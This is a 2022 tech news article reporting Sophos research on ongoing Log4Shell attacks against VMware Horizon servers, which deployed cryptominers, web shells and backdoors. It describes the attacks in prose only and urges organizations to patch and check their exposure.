• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar
  • Skip to footer

My TechDecisions

  • Best of Tech Decisions
  • Topics
    • Video
    • Audio
    • Mobility
    • Unified Communications
    • IT Infrastructure
    • Network Security
    • Physical Security
    • Facility
    • Compliance
  • RFP Resources
  • Resources
  • Podcasts
  • Project of the Week
  • About Us
    SEARCH
IT Infrastructure, Network Security, News

VMware Horizon Servers Still Under Log4Shell Attacks

Hackers are still using the Log4Shell exploit to attack VMware Horizon servers and deploy cryptominers and backdoors, according to Sophos.

March 29, 2022 Zachary Comeau Leave a Comment

Log4Shell, Log4j, CVE-2021-44228
stock.adobe.com/Jaiz Anuar

Hackers are continuing to leverage the Log4Shell vulnerability to attack VMware Horizon servers and deploy cryptocurrency mining malware and backdoors, with a large wave of such attacks from mid-January still ongoing, according to cybersecurity firm Sophos.

In a new report, Sophos says the attempts to leverage Horizon continued and grew in number throughout January and were frequently associated with attempts to deploy crypto miners, but others appeared to be associated with initial access brokers or ransomware gangs.

Log4Shell is a critical vulnerability that exists in Log4j, a popular Java logger that uses the Lightweight Directory Access Protocol (LDAP) resource. However, attackers can use that resource to retrieve a malicious Java class file that modified existing legitimate Java code, adding a web shell that provides remote access and code execution to the attackers. Those attacks were observed since the beginning of January, Sophos says in the report, published Tuesday.

A large wave of attacks began on Jan. 14, some of which used Cobalt Strike to stage and execute the cryptominer payloads. However, the largest wave of Log4Shell exploits aimed at Horizon detected by Sophos began Jan. 19, and this wave did not rely on Cobalt Strike. Instead, the crypto miner installer script is directly executed from the Apache Tomcat component of the Horizon server, the report says.

According to Sophos, earlier attacks had a typical process trace that shows them starting from the Tomcat service executable and ending with the execution of the PowerShell script, which executes a standard Cobalt Strike reverse shell.

However, other exploits bypass the use of Cobalt Strike altogether and use Log4Shell to directly target the Tomcat server within Horizon.

The payloads deployed to Horizon hosts range from various cryptocurrency miners including z0Miner, the JavaX miner and at least two XMRig variants, Jin and Mimu cryptocurrency miner bots.

In addition, Sophos discovered several backdoors being used, including the Sliver implant, Atera agent and Splashtop Streamer (both legitimate software products being abused), along with several PowerShell-based reverse shells.

While some payloads were downloaded directly be the web shells used for initial compromise, the Jin bots were tied to the use of Silver and used the same wallets as Mimo, suggesting they were used by the same threat group.

VMware Horizon servers are among the most targeted products of attackers using the Log4Shell exploit. VMware has issued patches, but many organizations still have not mitigated the vulnerabilities by applying the patch or workarounds.

Even if they are now patched, systems may already be compromised due to the backdoors and reverse shells used in these exploits, according to Sophos, which calls for organizations to thoroughly research their exposure to Log4Shell.

“Even if they have, as demonstrated by the backdoors and reverse shell activity we found, those systems may already be compromised in other ways,” the company says in its report.

Read the company’s report for more information on detecting these attacks.

If you enjoyed this article and want to receive more valuable industry content like this, click here to sign up for our digital newsletters!

Tagged With: Log4j, Log4Shell, Sophos, VMWare, Vulnerability

Related Content:

  • Cloud, SASE, Aryaka How the Cloud is Redefining Media Production and…
  • Singlewire Software mass notification interview Singlewire Software on Mass Notification Solutions
  • URI catchbox 1 Catchbox Plus: The Mic Solution That Finally Gave…
  • Engaging virtual meeting with diverse participants discussing creative ideas in a bright office space during daylight hours Diversified Survey: Workplace AV Tech is Falling Short,…

Free downloadable guide you may like:

  • Practical Design Guide for Office SpacesPractical Design Guide for Office Spaces

    Recent Gartner research shows that workers prefer to return to the office for in-person meetings for relevant milestones, as well as for face-to-face time with co-workers. When designing the office spaces — and meeting spaces in particular — enabling that connection between co-workers is crucial. But introducing the right collaboration technology in meeting spaces can […]

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Latest Downloads

Practical Design Guide for Office Spaces
Practical Design Guide for Office Spaces

Recent Gartner research shows that workers prefer to return to the office for in-person meetings for relevant milestones, as well as for face-to-fa...

New Camera Can Transform Your Live Production Workflow
New Camera System Can Transform Your Live Production Workflow

Sony's HXC-FZ90 studio camera system combines flexibility and exceptional image quality with entry-level pricing.

Creating Great User Experience and Ultimate Flexibility with Clickshare

Working and collaborating in any office environment today should be meaningful, as workers today go to office for very specific reasons. When desig...

View All Downloads

Would you like your latest project featured on TechDecisions as Project of the Week?

Apply Today!

More from Our Sister Publications

Get the latest news about AV integrators and Security installers from our sister publications:

Commercial IntegratorSecurity Sales

AV-iQ

Footer

TechDecisions

  • Home
  • Welcome to TechDecisions
  • Contact Us
  • Comment Guidelines
  • RSS Feeds
  • Twitter
  • Facebook
  • Linkedin

Free Technology Guides

FREE Downloadable resources from TechDecisions provide timely insight into the issues that IT, A/V, and Security end-users, managers, and decision makers are facing in commercial, corporate, education, institutional, and other vertical markets

View all Guides
TD Project of the Week

Get your latest project featured on TechDecisions Project of the Week. Submit your work once and it will be eligible for all upcoming weeks.

Enter Today!
Emerald Logo
ABOUTCAREERSAUTHORIZED SERVICE PROVIDERSYour Privacy ChoicesTERMS OF USEPRIVACY POLICY

© 2025 Emerald X, LLC. All rights reserved.